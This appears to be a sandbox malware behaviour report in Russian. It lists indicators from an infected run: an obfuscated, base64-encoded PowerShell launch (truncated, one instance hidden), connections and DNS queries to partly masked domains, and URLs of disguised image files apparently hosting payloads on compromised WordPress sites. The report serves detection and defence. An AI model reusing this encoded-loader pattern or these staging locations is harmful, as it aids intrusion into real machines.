Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAE0AcAByAGUAUwBzAGkATwBOAC4AZABlAEYAbABhAHQAZQBTAHQAUgBlAEEATQAoAFsAcwB5AFMAdABFAG0ALgBpAE8ALgBtAGUAbQBvAFIAWQBzAHQAUgBFAGEATQBdACAAWwBDAG8ATgB2AG...
- 'no####lecular.com':80
- 'no####lecular.com':443
- 'pr#####-elevator.com':80
- 'el#######acilityservices.com':443
- 'sm####techguy.com':80
- 'sm####techguy.com':443
- http://no####lecular.com/wp-content/themes/twentyfifteen/images/rightarrow.png
- http://pr#####-elevator.com/wp-content/themes/eyesoreinc/content/wplogo.png
- http://sm####techguy.com/.cpanel/store.png
- 'no####lecular.com':443
- 'el#######acilityservices.com':443
- 'sm####techguy.com':443
- DNS ASK no####lecular.com
- DNS ASK pr#####-elevator.com
- DNS ASK el#######acilityservices.com
- DNS ASK sm####techguy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAE0AcAByAGUAUwBzAGkATwBOAC4AZABlAEYAbABhAHQAZQBTAHQAUgBlAEEATQAoAFsAcwB5AFMAdABFAG0ALgBpAE8ALgBtAGUAbQBvAFIAWQBzAHQAUgBFAGEATQBdACAAWwBDAG8ATgB2AG...' (со скрытым окном)